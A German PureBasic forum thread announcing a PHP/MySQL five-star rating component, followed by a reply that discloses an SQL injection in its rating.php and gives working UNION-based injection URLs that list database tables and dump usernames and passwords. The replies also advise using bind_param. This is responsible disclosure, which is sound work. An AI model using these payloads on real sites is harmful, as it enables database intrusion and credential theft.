Fivestar Rating Control (x32/x64+Theme-Support)
Fivestar Rating Control (x32/x64+Theme-Support)
Hallo PBBFF´s,
kleines Zubehör. Benötigt ist Webspace mit einer MySQL Datenbank. Beschreibung der Funktionen ist in der 'Example.pb' zu finden. Oh, bevor ich´s vergesse, bewertet es doch bitte gleich.
Achtung
Vermute es liegt an den Netzwerk-Funktionen, aber Avira verursacht bei mir ein POLINK Fehler (nur x32) - einfach den Echtzeit-Scanner deaktivieren oder mit Debugger kompilieren, werde das bald beheben.
Features
- Theme-Support
- Crossplatform (x32/x64)
- Vollständiges online-Bewertungssystem
- Text-Masken
- Eigene Bewertungssymbole
- Für beliebig viele Anwendungen/Spiele nutzbar
To-Do
- IP-Adressen speichern um doppelte Bewertungen zu vermeiden
- Kommentare
Installation (für Beispiel nicht benötigt)
1. SQL Befehle der 'SQL Install.txt' Datei ausführen.
2. Variablen der 'rating.php' Datei bearbeiten wie $Password, $DB_Name und $Username.
3. Die 'rating.php' Datei auf den Webspace hochladen.
Jetzt können Nutzer deine Anwendungen/Spiele etc. durch AppID´s bewerten.
kleines Zubehör. Benötigt ist Webspace mit einer MySQL Datenbank. Beschreibung der Funktionen ist in der 'Example.pb' zu finden. Oh, bevor ich´s vergesse, bewertet es doch bitte gleich.
Achtung
Vermute es liegt an den Netzwerk-Funktionen, aber Avira verursacht bei mir ein POLINK Fehler (nur x32) - einfach den Echtzeit-Scanner deaktivieren oder mit Debugger kompilieren, werde das bald beheben.
Features
- Theme-Support
- Crossplatform (x32/x64)
- Vollständiges online-Bewertungssystem
- Text-Masken
- Eigene Bewertungssymbole
- Für beliebig viele Anwendungen/Spiele nutzbar
To-Do
- IP-Adressen speichern um doppelte Bewertungen zu vermeiden
- Kommentare
Installation (für Beispiel nicht benötigt)
1. SQL Befehle der 'SQL Install.txt' Datei ausführen.
2. Variablen der 'rating.php' Datei bearbeiten wie $Password, $DB_Name und $Username.
3. Die 'rating.php' Datei auf den Webspace hochladen.
Jetzt können Nutzer deine Anwendungen/Spiele etc. durch AppID´s bewerten.
Zuletzt geändert von Lambda am 16.04.2013 15:56, insgesamt 1-mal geändert.
Re: Fivestar Rating Control (x32/x64+Theme-Support)
und wo findet man die example.pb?Alexi hat geschrieben:Beschreibung der Funktionen ist in der 'Example.pb' zu finden.
Grüße ... Kiffi
Hygge
Re: Fivestar Rating Control (x32/x64+Theme-Support)
Danke für den schnellen Hinweiß. Korrigiert. (MCF/Fivestar/Windows/Other/PB/Example.pb)
-
- Beiträge: 112
- Registriert: 23.07.2012 19:19
Re: Fivestar Rating Control (x32/x64+Theme-Support)
Die example.pb ist immer noch nicht da !
PureBasic: Immer das neueste
Windows 8.1 / AMD FX 6100 / R9280X / 8GB RAM
Macbook Pro 2015 Retina
Dell Inspiron 1720 mit Linux Mint
...Und diverse Kleinstcomputer
Windows 8.1 / AMD FX 6100 / R9280X / 8GB RAM
Macbook Pro 2015 Retina
Dell Inspiron 1720 mit Linux Mint
...Und diverse Kleinstcomputer
Re: Fivestar Rating Control (x32/x64+Theme-Support)
Huh jetzt aber.
Re: Fivestar Rating Control (x32/x64+Theme-Support)
Hi,
sieht nett aus, aber diese MySQL Injection lässt grüßen:
z.B. zeigt folgende url
alle Tabellen in allen Datenbanken an, die der Benutzer sehen darf. Wenn man das ganze url decodiert sieht die Injection so aus:
Folgende URL zeigt z.b. die Felder User and Pass von der Tabelle secret an:
nochmal ohne URL encodierung:
Das PHP Skript sollte also nochmal überarbeitet werden.
Dark
sieht nett aus, aber diese MySQL Injection lässt grüßen:
Code: Alles auswählen
$sql = 'SELECT
SUM(Vote),
COUNT(*)
FROM
mcf_fivestar
WHERE AppID='.$_GET['id'];
Code: Alles auswählen
rating.php?request=votes&id=-1%20UNION%20ALL%20SELECT%20group_concat(table_name%20separator%20'%5Cr%5Cn')%2C%20'your_tables_are%3A'%20FROM%20INFORMATION_SCHEMA.tables%20WHERE%20table_type%3D'BASE%20TABLE'
Code: Alles auswählen
-1 UNION ALL SELECT group_concat(table_name separator '\r\n'), 'your_tables_are:' FROM INFORMATION_SCHEMA.tables WHERE table_type='BASE TABLE'
Code: Alles auswählen
rating.php?request=votes&id=-1%20UNION%20ALL%20SELECT%20group_concat(CONCAT(User%2C%20'%20%3A%20'%2C%20Pass)%20separator%20'%5Cr%5Cn%20')%2C%201%20FROM%20secret%0A
Code: Alles auswählen
-1 UNION ALL SELECT group_concat(CONCAT(User, ' : ', Pass) separator '\r\n '), 1 FROM secret
Dark
Mein Blog: http://fds-team.de/cms/
Re: Fivestar Rating Control (x32/x64+Theme-Support)
Letzteres konnte ich nicht nachstellen, bekomme einen PHP Fehler. Danke für den Hinweis, wäre sehr nett wenn du es überarbeiten könntest, da du dich anscheinend gut mit Sicherheitslücken in dem Bereich auskennst.
Re: Fivestar Rating Control (x32/x64+Theme-Support)
Du benötigst natürlich auch eine Tabelle secret um das nachzustellen. Folgende Tabelle wäre z.b. zum Testen geeignet:
ergibt z.B. folgenden Output:
Du musst den Wert id vorher escapen und in Anführungszeichen '' packen bevor du es an mysql übergibst. Alternativ kannst du das ganze so machen wie bei rate, bei dem die Parameter separat übergeben werden, so dass PHP diese automatisch escaped.
Dark
Code: Alles auswählen
mysql> SELECT * from secret;
+--------+---------------------------+
| User | Pass |
+--------+---------------------------+
| root | super_secret_plaintext_pw |
| nobody | test |
+--------+---------------------------+
Code: Alles auswählen
1|root : super_secret_plaintext_pw
nobody : test
Dark
Mein Blog: http://fds-team.de/cms/
Re: Fivestar Rating Control (x32/x64+Theme-Support)
@Alexi: Du musst einfach bind_param() verwenden. Das hast Du ja einige Zeilen darüber ebenso gemacht.
Grüße ... Kiffi
Grüße ... Kiffi
Hygge
Re: Fivestar Rating Control (x32/x64+Theme-Support)
Die AppID wird als Parameter übergeben, das schließt die Lücken dann bereits?